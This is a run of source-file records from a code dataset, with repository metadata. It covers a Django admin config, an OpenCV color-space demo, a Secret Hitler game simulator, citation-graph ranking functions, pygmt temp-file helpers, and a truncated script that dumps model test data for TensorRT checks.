('timestamp', 'summary__station__number')\n raw_id_fields = ('summary',)\n\n\n@admin.register(models.DetectorTimingOffset)\nclass DetectorTimingOffsetAdmin(admin.ModelAdmin):\n list_display = ('summary', 'offset_1', 'offset_2', 'offset_3', 'offset_4')\n list_filter = ('summary__station__number',)\n raw_id_fields = ('summary',)\n\n\n@admin.register(models.StationTimingOffset)\nclass StationTimingOffsetAdmin(admin.ModelAdmin):\n list_display = ('ref_summary', 'summary', 'offset', 'error')\n list_filter = ('ref_summary__station__number', 'summary__station__number', 'ref_summary__date')\n raw_id_fields = ('ref_summary', 'summary')\n\n\nadmin.site.register(models.HistogramType)\nadmin.site.register(models.DatasetType)\n", "repo_name": "HiSPARC/publicdb", "sub_path": "publicdb/histograms/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 5696, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 11, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 19, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 18, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 25, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 30, "usage_type": "name"}, {"api_name": 
"django.contrib.admin.StackedInline", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 35, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 40, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 45, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 51, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 51, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 50, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 50, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 87, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 87, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 86, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 86, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 164, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 164, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 163, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 163, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 171, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 171, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 170, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 170, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 178, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 178, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 177, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 177, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 184, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 184, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 184, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 185, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 185, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 185, "usage_type": "name"}]}
+{"seq_id": "25794115374", "text": "import cv2\n\nimagem = cv2.imread(\"imagemTeste.jpg\")\n\n# Convertendo a imagem de RGB para HSV e depois segmentando\nimagem = cv2.cvtColor(imagem, cv2.COLOR_BGR2HSV)\nmatiz, saturacao, valor = cv2.split(imagem)\n\ncv2.imshow(\"Canal H\", matiz)\ncv2.imshow(\"Canal S\", saturacao)\ncv2.imshow(\"Canal V\", valor)\n\n# Combinando as imagens segmentadas\nimagem = cv2.merge((matiz, saturacao, valor))\nimagem = cv2.cvtColor(imagem, cv2.COLOR_HSV2BGR)\n\ncv2.imshow(\"Imagem\", imagem)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()", "repo_name": "ThayDias/visao-computacional", "sub_path": "Introducao a Visao Computacional/4. Representação de Cores no Espaço/converterRGBparaHSV.py", "file_name": "converterRGBparaHSV.py", "file_ext": "py", "file_size_in_byte": 498, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.imread", "line_number": 3, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 6, "usage_type": "attribute"}, {"api_name": "cv2.split", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.COLOR_HSV2BGR", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 20, "usage_type": "call"}]}
+{"seq_id": "1049999743", "text": "import random\nfrom Agent import *\nfrom argparse import ArgumentParser\nimport sys, inspect\nimport importlib\n\n'''\nSH_Game is a class that step by step simulates the game of Secret Hitler\n - do_round() simulates one round of the game\n - records what happens during the game\n - supplies agents with appropriate info\n'''\nclass SH_Game:\n #initialization\n def __init__(self):\n self.agents = []\n self.president = None\n self.last_candidate = None\n self.last_president = None\n self.last_chancellor = None\n self.election_tracker = 0\n self.deck = [] # liberal cards are 0, fascist cards are 1\n self.discard_pile = []\n self.lib_policy = 0 # counters for how many lib/fas policies have been played\n self.fas_policy = 0\n self.winner = None # 'L' if liberals win and 'F' if fascists win\n self.win_method = None #report on how the winning team won\n self.can_veto = False\n self.special_election = False\n #this is a list of dictionaries that store info on all of the \"game events\"\n self.history=[]\n \n #called at the start of the game\n def new_game(self,player_count,lib_agnt,fas_agnt,hit_agnt):\n #general initialization\n self.__init__()\n #initialize the agents, with number of roles respective to game\n lib_count = 3 + int((player_count-4)/2)\n fas_count = 1 + int((player_count-5)/2)\n #liberals\n libs = [lib_agnt('L',self) for i in range(lib_count)]\n #fascists\n fasc = [fas_agnt('F',self) for i in range(fas_count)]\n #hitler\n self.agents = libs + fasc + [hit_agnt('H',self)]\n #have the agents sit in random order and update their indexes\n random.shuffle(self.agents)\n for i in range(player_count):\n self.agents[i].index = i\n #randomly select a first president\n self.president = self.agents[0]\n #put cards into the deck, no cards played yet; 6 liberal 11 fascist\n self.deck = [0 for _ in range(6)] + [1 for _ in range(11)]\n random.shuffle(self.deck)\n \n \n #getters\n #returns self.winner (None for in-progress game, L for libs, F for fascists)\n def win(self):\n return self.winner\n \n #returns a string explaining how the winners won: None if no winner\n def result(self):\n if self.winner==None: return None\n if self.lib_policy==5:\n return 'liberal cards'\n if self.fas_policy==6:\n return 'fascist cards'\n for agent in self.agents:\n if agent.role=='H' and agent.is_dead:\n return 'dead hitler'\n return 'elected hitler'\n \n #prints the history of the game in a readable format\n def print_game(self):\n #print the roles of every player\n for a in self.agents:\n if a.role=='F':\n print('*Player ' + str(a.index) + ' is a fascist.')\n for a in self.agents:\n if a.role=='H':\n print('*Player ' + str(a.index) + ' is Hitler.')\n print('')\n \n #print every sequential event in the game\n L = 0\n F = 0\n for event in self.history:\n e = event['event']\n p = None\n if 'president' in event: p=str(event['president'])\n if e=='election':\n print('There are ' + str(L) + ' liberal polcies and ' + str(F) + ' fascist policies that have been played.')\n print('Player '+p+' is the president and picks player '+str(event['chancellor'])+' for chancellorship.')\n print('Everyone votes on this pair: '+str(event['votes']))\n if event['result']!='failure':\n print('The vote succeeds.')\n if event['result']=='Hitler':\n print('Hitler has been elected chancellor.')\n else:\n print('*The president picks up the cards: ' + str(event['pres_hand']))\n print('*The chancellor receives the cards: ' + str(event['chanc_hand']))\n if event['result']=='veto':\n print('The president and 
chancellor agree to veto this hand.')\n else:\n print('A ' + ('fascist' if event['result']==1 else 'liberal') + ' policy is played by the chancellor.')\n print('The president claims to have received: ' + str(event['pres_claim']))\n print('The chancellor claims to have received: ' + str(event['chanc_claim']))\n if event['result']==1: F += 1\n else: L += 1 \n else:\n print('The vote fails.')\n if e=='breakfast':\n print('Three presidencies have failed in a row. The top card, a' + (' fascist' if event['card'] else ' liberal') + ', is played.')\n if event['card']: F += 1\n else: L += 1\n if e=='reshuffle':\n print('The deck is reshuffled.')\n if e=='investigation':\n print('President ' + p + ' investigates player ' + str(event['invest']) + ' and claims they are ' + event['pres_claim']+'.')\n if e=='top three':\n print('President ' + p + ' looks at the top three cards and claims to see: ' + str(event['claim'])+'. *Actual: ' + str(event['cards']))\n if e=='special_election':\n print('Special Election: President ' + p + ' chooses player ' + str(event['new_pres']) + ' to be the next president.')\n if e=='kill':\n print('President ' + p + ' kills player ' + str(event['killed']) + '!')\n print('')#space between events\n \n #print the final game result\n print('Game Result: ' + game.result() + '\\n')\n \n #setters\n #checks to see if we need to reshuffle the deck:\n # > when there are less than 3 cards available\n def reshuffle(self):\n #reshuffle check if need be\n if len(self.deck) < 3: \n self.history += [{'event':'reshuffle'}]\n #combine discard pile into deck\n self.deck = self.deck + self.discard_pile\n self.discard_pile = []\n #shuffle deck\n random.shuffle(self.deck)\n return True\n return False\n \n #plays the given card\n def play_card(self,card):\n #if liberal card\n if card==0:\n self.lib_policy += 1\n #if fascist card\n else:\n self.fas_policy += 1\n #victory by cards played\n if self.lib_policy == 5:\n self.winner = 'L'\n if self.fas_policy == 6:\n self.winner = 'F'\n\n #called when an election fails or if veto power is used\n def increment_election_tracker(self):\n self.election_tracker += 1\n #third failed presidency\n if self.election_tracker==3:\n #randomly play top card, reset election traker, and reset 'term limits'\n card = self.deck.pop()\n self.history += [{'event':'breakfast','card':card}]\n self.play_card(card)\n self.election_tracker = 0 \n self.last_president = None\n self.last_chancellor = None\n \n #core game logic\n def do_round(self):\n N = len(self.agents)\n\n #assume this presidency will fail and then update otherwise \n event= {'event':'election'}\n event['pres_hand']=event['pres_claim']=event['chanc_hand']=event['chanc_claim']=None\n event['result'] = 'failure'\n \n\t\t# if need be, reshuffle the deck before the round starts\n self.reshuffle()\n \n\t\t# the predetermined president selects a chancellor from the list of valid options,\n # and the whole group votes on this decision\n president = self.president\n event['president'] = president.index\n if not self.special_election:\n self.last_candidate = president\n #reset special election\n self.special_election = False\n #give the president his options for chancellor\n options = [a for a in self.agents]\n for a in self.agents:\n # NOTE: last elected president may be available depending on number of players\n if a.is_dead or a==president or a == self.last_chancellor or (sum([0 if agnt.is_dead else 1 for agnt in self.agents])>5 and a == self.last_president):\n options.remove(a)\n chancellor = 
president.select_chancellor(options)\n event['chancellor'] = chancellor.index\n votes = []\n for agent in self.agents:\n if not agent.is_dead:\n votes.append(agent.vote(president,chancellor))\n else:\n votes.append(0)\n event['votes'] = votes\n \n pick = None\n #successful presidency: most living people voted yes\n if sum(votes) > sum([0 if a.is_dead else 1 for a in self.agents])/2:\n #update last president/chancellor\n self.last_president = president\n self.last_chancellor = chancellor\n self.election_tracker = 0\n # when at least three fascist cards have been played,\n # fascists can win by electing hitler as chancellor\n if self.fas_policy >= 3 and chancellor.role=='H':\n #the chancellor is hiter -> fascists win\n self.winner = 'F'\n event['result'] = 'Hitler'\n self.history += [event]\n else:\n #do legislation: president gets top three cards\n hand = [self.deck.pop() for _ in range(3)]\n event['pres_hand'] = [x for x in hand] #copy list\n #store president's claim\n p_claim = president.pres_claim(chancellor,hand)\n event['pres_claim'] = p_claim\n #president discards one of these cards\n pick = president.pres_discard(chancellor,hand)\n hand.remove(pick)\n self.discard_pile.append(pick)\n event['chanc_hand'] = [x for x in hand] #copy list\n #store chancellor's claim\n c_claim = chancellor.chanc_claim(hand)\n event['chanc_claim'] = c_claim\n pick = None \n #if veto power is unlocked then the chancellor and president\n #can agree to play neither of the policies: end of round\n if self.can_veto and president.veto(hand,True) and chancellor.veto(hand,False):\n event['result'] = 'veto' #no card is played\n self.discard_pile += hand\n self.increment_election_tracker()\n else:\n #chancellor picks one of the two remaining cards, discards the other\n pick = chancellor.chancellor_pick(hand)\n event['result'] = pick \n hand.remove(pick)\n self.discard_pile += hand\n self.play_card(pick)\n \n #add this election & legislation to the history of events\n self.history += [event]\n \n #if a fascist card is played, account for president powers\n if pick == 1:\n #small game president powers\n if N < 7:\n self.reshuffle()\n #look at top three cards\n if self.fas_policy==3:\n top = self.deck[-3:]\n claim = president.top_three(top)\n self.history += [{'event':'top three',\n 'cards':[x for x in top],\n 'president':president.index,\n 'claim':claim}]\n #large game president powers\n else:\n #investigation\n #in very large game 9-10, first fascist played results in an investigation\n if (N > 8 and self.fas_policy==1) or self.fas_policy==2:\n ops = [a for a in self.agents]\n ops.remove(president)\n invest,claim = president.investigation(ops)\n accusation = 0\n if claim=='L': accusation = 1\n if claim=='F': accusation = 2\n actual = 1\n if invest.get_role()=='L': actual = 0\n self.history += [{'event':'investigation',\n 'president':president.index,\n 'invest':invest.index,\n 'pres_claim':claim}]\n #special election\n if self.fas_policy==3:\n #the president select another player to be president for the next round\n ops = []\n for agent in self.agents:\n if agent.is_dead or agent==president: continue\n ops.append(agent)\n self.president = president.pres_special(ops)\n self.special_election = True\n # add special election to history of events\n self.history += [{'event':'special_election',\n 'president':president.index,\n 'new_pres':self.president.index}]\n #general game powers\n #kill\n if self.fas_policy==4 or self.fas_policy==5:\n ops = []\n for agent in self.agents:\n if not agent.is_dead:\n ops.append(agent)\n kill 
= president.kill(ops)\n kill.is_dead = True\n self.history += [{'event':'kill',\n 'president':president.index,\n 'killed':kill.index}]\n #if hitler is killed, liberals win\n if kill.role=='H':\n self.winner ='L'\n #veto power unlocked\n if self.fas_policy==5:\n self.can_veto = True\n #failed presidency\n else:\n self.history += [event]\n self.increment_election_tracker()\n # shift presidency left of last candidate for presidency\n if not self.special_election:\n #dead people can't be president!\n index = (self.last_candidate.index - 1)%N\n while self.agents[index].is_dead:\n index = (index - 1)%N\n self.president = self.agents[index]\n return None\n \n #looping of core game logic until a victor is found\n def play_game(self):\n while not self.win():\n self.do_round()\n return self.win()\n\nif __name__=='__main__':\n parser = ArgumentParser()\n parser.add_argument(\"-l\", \"--liberal\", required=False, default='GenericLiberalAgent', help=\"The agent (strategies) to be used by all liberal players.\")\n parser.add_argument(\"-f\", \"--fascist\", required=False, default='GenericFascistAgent', help=\"The agent (strategies) to be used by all fascist players.\")\n parser.add_argument(\"-r\", \"--hitler\", required=False, default='GenericHitlerAgent', help=\"The agent (strategies) to be used by Hitler.\")\n parser.add_argument(\"-p\", \"--numPlayers\", required=False, default=5, help=\"The number of players in the game [5-10].\", type=int, choices={5,6,7,8,9,10})\n parser.add_argument(\"-n\", \"--numGames\", required=False, default=1, help=\"The number of games to run. Running a single game will print out the event details of that game.\", type=int)\n parser.add_argument(\"-a\", \"--all\", required=False, default='false', help=\"Iterates over all possible number of players [5-10], as opposed to just a specific number of players\", choices={'true', 'false'})\n args = parser.parse_args()\n \n game = SH_Game()\n \n if(args.liberal != GenericLiberalAgent and args.liberal not in sys.modules.keys()):\n raise ValueError('The optional arugment [liberal] must be an already included module')\n if(args.fascist != GenericFascistAgent and args.fascist not in sys.modules.keys()):\n raise ValueError('The optional arugment [fascist] must be an already included module')\n if(args.hitler != GenericHitlerAgent and args.hitler not in sys.modules.keys()):\n raise ValueError('The optional arugment [hitler] must be an already included module')\n if(args.numGames < 1):\n raise ValueError('Cannot run a non-positive number of games')\n \n # Convert all the input strings into instances of that agent\n module = importlib.import_module(args.liberal)\n class_ = getattr(module, args.liberal)\n l_a = class_\n \n module = importlib.import_module(args.fascist)\n class_ = getattr(module, args.fascist)\n f_a = class_\n \n module = importlib.import_module(args.hitler)\n class_ = getattr(module, args.hitler)\n h_a = class_\n \n N = args.numGames #N=1 to view a game, N=10000 for testing\n\n P = args.numPlayers\n \n for p in range(5,11):\n if args.all == 'false':\n if p != P:\n continue\n records = []\n result = [] \n\n for i in range(N):\n game.new_game(p, l_a, f_a, h_a)\n records.append(game.play_game())\n result.append(game.result()) \n if N == 1 and args.all == 'false':\n game.print_game()\n if N>1 or (N==1 and args.all == 'true'):\n print('with '+str(p)+' players, fascists win: '+str(sum([1 if x=='F' else 0 for x in records])/N))\n print('percent of the time')\n print('liberals win with cards: ' + str(sum([1 if x=='liberal cards' 
else 0 for x in result])/N))\n print('fascists win with cards: ' + str(sum([1 if x=='fascist cards' else 0 for x in result])/N))\n print('liberals kill hitler: ' + str(sum([1 if x=='dead hitler' else 0 for x in result])/N))\n print('fascists elect hitler: ' + str(sum([1 if x=='elected hitler' else 0 for x in result])/N))", "repo_name": "wippra/SH_Simulation", "sub_path": "secret_hitler.py", "file_name": "secret_hitler.py", "file_ext": "py", "file_size_in_byte": 18759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.shuffle", "line_number": 47, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 54, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 143, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 338, "usage_type": "call"}, {"api_name": "sys.modules.keys", "line_number": 349, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 349, "usage_type": "attribute"}, {"api_name": "sys.modules.keys", "line_number": 351, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 351, "usage_type": "attribute"}, {"api_name": "sys.modules.keys", "line_number": 353, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 353, "usage_type": "attribute"}, {"api_name": "importlib.import_module", "line_number": 359, "usage_type": "call"}, {"api_name": "importlib.import_module", "line_number": 363, "usage_type": "call"}, {"api_name": "importlib.import_module", "line_number": 367, "usage_type": "call"}]}
+{"seq_id": "24740063090", "text": "import numpy as np\nimport igraph as ig\n\n\ndef get_CiteRank(G, half_life, p=.85):\n \"\"\"\n Retuns the CiteRank of a graph\n (see https://arxiv.org/pdf/physics/0612122.pdf)\n\n CiteRank is a particular PersonalizedPage rank where the reset\n probabilities exponentially decay with age of the vertex.\n\n Parameters\n ----------\n G: igraph graph, assumes 'year' is a vertex atttribute\n\n half_life: the half life of the exponential decay i.e.\n reset_prob_i propto 2^(- age_i / half_life)\n\n Returns\n -------\n CiteRank\n \"\"\"\n\n # years of each case\n years = np.array(G.vs['year'])\n current_year = max(years)\n\n # compute exponentially decaying probabilities\n ages = current_year - years\n exp_weights = 2 ** (- ages/float(half_life))\n probs = exp_weights / exp_weights.sum()\n\n return G.personalized_pagerank(damping=p, reset=probs)\n\n\ndef get_CiteRankPoly(G, exponent, p=.85):\n \"\"\"\n Retuns the CiteRank of a graph\n (see https://arxiv.org/pdf/physics/0612122.pdf)\n\n CiteRank is a particular PersonalizedPage rank where the reset\n probabilities exponentially decay with age of the vertex.\n\n Parameters\n ----------\n G: igraph graph, assumes 'year' is a vertex atttribute\n\n exponent: the exponent of the decay i.e.\n reset_prob_i propto 1/(age + 1)^exponent\n\n Returns\n -------\n CiteRank\n \"\"\"\n # years of each case\n years = np.array(G.vs['year'])\n current_year = max(years)\n\n # compute exponentially decaying probabilities\n ages = current_year - years\n weights = 1.0 / (1.0 + ages) ** exponent\n probs = weights / weights.sum()\n\n return G.personalized_pagerank(damping=p, reset=probs)\n\n\ndef get_recent_citations(G, current_year, threshold):\n \"\"\"\n Number of citations in past T years\n\n Parameters\n ---------\n G: igraph object with 'year' vertex attributes\n\n current_year: current year\n\n threshold: how many years before to look\n\n Output\n ------\n Returns a list ordered by ig index of recent citations\n\n i.e. number citations that happend after current_year - threshold\n \"\"\"\n threshold_year = current_year - threshold\n return [get_citations_upto_(v, threshold_year) for v in G.vs]\n\n\ndef get_citations_upto_(v, threshold_year):\n \"\"\"\n Retunrs the recent citaions for a given vertex\n\n helper function for get_recent_citations\n\n Parameters\n ----------\n v: vertex object from igraph object\n\n threshold_year: get citations that happened after this year\n \"\"\"\n return len([ing for ing in v.neighbors(mode=\"IN\")\n if threshold_year <= ing['year']])\n\n\ndef get_reverse_graph(G):\n \"\"\"\n Reverses the eges of a graph\n\n Paramters\n ---------\n G: the graph to reverse\n\n Output\n ------\n reversed graph (does not include any vertex attributes)\n \"\"\"\n G_rev = ig.Graph(n=len(G.vs), directed=True)\n\n # get reversed edge list\n rev_EL = [(e[1], e[0]) for e in G.get_edgelist()]\n\n G_rev.add_edges(rev_EL)\n\n return G_rev\n", "repo_name": "idc9/law-net", "sub_path": "vertex_metrics_experiment/code/custom_vertex_metrics.py", "file_name": "custom_vertex_metrics.py", "file_ext": "py", "file_size_in_byte": 3021, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "igraph.Graph", "line_number": 118, "usage_type": "call"}]}
+{"seq_id": "18914510320", "text": "\"\"\"\nUtilities for dealing with temporary file management.\n\"\"\"\nimport os\nimport uuid\nfrom contextlib import contextmanager\nfrom tempfile import NamedTemporaryFile\n\nimport numpy as np\n\n\ndef unique_name():\n \"\"\"\n Generate a unique name.\n\n Useful for generating unique names for figures (otherwise GMT will plot\n everything on the same figure instead of creating a new one).\n\n Returns\n -------\n name : str\n A unique name generated by :func:`uuid.uuid4`\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass GMTTempFile:\n \"\"\"\n Context manager for creating closed temporary files.\n\n This class does not return a file-like object. So, you can't do\n ``for line in GMTTempFile()``, for example, or pass it to things that\n need file objects.\n\n Parameters\n ----------\n prefix : str\n The temporary file name begins with the prefix.\n suffix : str\n The temporary file name ends with the suffix.\n\n Examples\n --------\n >>> import numpy as np\n >>> with GMTTempFile() as tmpfile:\n ... # write data to temporary file\n ... x = y = z = np.arange(0, 3, 1)\n ... np.savetxt(tmpfile.name, (x, y, z), fmt=\"%.1f\")\n ... lines = tmpfile.read()\n ... print(lines)\n ... nx, ny, nz = tmpfile.loadtxt(unpack=True, dtype=float)\n ... print(nx, ny, nz)\n ...\n 0.0 1.0 2.0\n 0.0 1.0 2.0\n 0.0 1.0 2.0\n \n [0. 0. 0.] [1. 1. 1.] [2. 2. 2.]\n \"\"\"\n\n def __init__(self, prefix=\"pygmt-\", suffix=\".txt\"):\n args = dict(prefix=prefix, suffix=suffix, delete=False)\n with NamedTemporaryFile(**args) as tmpfile:\n self.name = tmpfile.name\n\n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n if os.path.exists(self.name):\n os.remove(self.name)\n\n def read(self, keep_tabs=False):\n \"\"\"\n Read the entire contents of the file as a Unicode string.\n\n Parameters\n ----------\n keep_tabs : bool\n If False, replace the tabs that GMT uses with spaces.\n\n Returns\n -------\n content : str\n Content of the temporary file as a Unicode string.\n \"\"\"\n with open(self.name, mode=\"r\", encoding=\"utf8\") as tmpfile:\n content = tmpfile.read()\n if not keep_tabs:\n content = content.replace(\"\\t\", \" \")\n return content\n\n def loadtxt(self, **kwargs):\n \"\"\"\n Load data from the temporary file using numpy.loadtxt.\n\n Parameters\n ----------\n kwargs : dict\n Any keyword arguments that can be passed to numpy.loadtxt.\n\n Returns\n -------\n ndarray\n Data read from the text file.\n \"\"\"\n return np.loadtxt(self.name, **kwargs)\n\n\n@contextmanager\ndef tempfile_from_geojson(geojson):\n \"\"\"\n Saves any geo-like Python object which implements ``__geo_interface__``\n (e.g. a geopandas.GeoDataFrame or shapely.geometry) to a temporary OGR_GMT\n text file.\n\n Parameters\n ----------\n geojson : geopandas.GeoDataFrame\n A geopandas GeoDataFrame, or any geo-like Python object which\n implements __geo_interface__, i.e. a GeoJSON.\n\n Yields\n ------\n tmpfilename : str\n A temporary OGR_GMT format file holding the geographical data.\n E.g. 
'1a2b3c4d5e6.gmt'.\n \"\"\"\n with GMTTempFile(suffix=\".gmt\") as tmpfile:\n os.remove(tmpfile.name) # ensure file is deleted first\n ogrgmt_kwargs = dict(filename=tmpfile.name, driver=\"OGR_GMT\", mode=\"w\")\n try:\n # Using geopandas.to_file to directly export to OGR_GMT format\n geojson.to_file(**ogrgmt_kwargs)\n except AttributeError:\n # pylint: disable=import-outside-toplevel\n # Other 'geo' formats which implement __geo_interface__\n import json\n\n import fiona\n import geopandas as gpd\n\n with fiona.Env():\n jsontext = json.dumps(geojson.__geo_interface__)\n # Do Input/Output via Fiona virtual memory\n with fiona.io.MemoryFile(file_or_bytes=jsontext.encode()) as memfile:\n geoseries = gpd.GeoSeries.from_file(filename=memfile)\n geoseries.to_file(**ogrgmt_kwargs)\n\n yield tmpfile.name\n", "repo_name": "geodeepak/Pygmt", "sub_path": "pygmt/helpers/tempfile.py", "file_name": "tempfile.py", "file_ext": "py", "file_size_in_byte": 4335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "uuid.uuid4", "line_number": 24, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 107, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 130, "usage_type": "call"}, {"api_name": "fiona.Env", "line_number": 143, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 144, "usage_type": "call"}, {"api_name": "fiona.io.MemoryFile", "line_number": 146, "usage_type": "call"}, {"api_name": "fiona.io", "line_number": 146, "usage_type": "attribute"}, {"api_name": "geopandas.GeoSeries.from_file", "line_number": 147, "usage_type": "call"}, {"api_name": "geopandas.GeoSeries", "line_number": 147, "usage_type": "attribute"}, {"api_name": "contextlib.contextmanager", "line_number": 110, "usage_type": "name"}]}
+{"seq_id": "2825660779", "text": "#生成yml数据,将模型的输入与输出写入yml,用于进行部署的时候验证TensorRT结果是否对。\n#前面的代码\nfrom util.utils import *\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\nimport torch\nimport time\nfrom util.prune_utils import *\nimport argparse\nfrom util.parse_config import *\n# from utils_junjie import tools, timer\nfrom utils_junjie.utils import *\nfrom utils_junjie.visualization import *\nfrom utils_junjie.get_module_list import *\nfrom PIL import Image\nimport cv2\nfrom collections import OrderedDict\n\nparser = argparse.ArgumentParser(description=\"demo for rotated image detection\")\nparser.add_argument('--model_name', type=str, default='rapid',\n help='the name of model')\nparser.add_argument('--model_def', type=str, default='cfg/prune_0.9_prune_rotate_detection_darknet53_256.cfg')\nparser.add_argument('--model', type=str, default='weights/rapid_pL1_dark53_Jan05-15_0.9_1_339000.pth',\n help='model path')\nparser.add_argument('--img_path', type=str, default='test/43264/JPEGImages',\n help='image path')\nparser.add_argument('--input_size', type=int, default=(256, 512))\nparser.add_argument('--conf_thres', type=float, default=0.5)\nparser.add_argument('--visualize', type=bool, default=True)\nparser.add_argument('--preprocess_type', type=str, default='cv2', choices=['cv2', 'torch'],\n help='image preprocess type')\nargs = parser.parse_args()\n\nmodule_defs = parse_model_config(args.model_def)\n# module_defs.pop(0)\nmodel = RotateDetectNet(module_defs)\npretrained_dict = torch.load(args.model)\nmodel.load_state_dict(pretrained_dict['model'])\nfor parameter in model.parameters():\n parameter.requires_grad = False\nmodel.eval()\nfs = cv2.FileStorage(\"/data/TrtInfer/samples/testcases0.ymal\",cv2.FileStorage_WRITE)\nfs.write(\"testcase_num\",5)\nfor number in range(5):\n # input = torch.randn(2,3,256,512)\n input_shape = (args.input_size[0], args.input_size[1],3)\n input = torch.randn(4, *input_shape)\n output = model(input)\n fs.write(\"testcase_input\"+str(number),input.cpu().numpy())\n for i in range(len(output)):\n fs.write(\"testcase_output\"+str(number)+\"_\"+str(i),output[i].detach().numpy())", "repo_name": "EvaceLi/dl_common_script", "sub_path": "produce_data.py", "file_name": "produce_data.py", "file_ext": "py", "file_size_in_byte": 2228, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 5, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 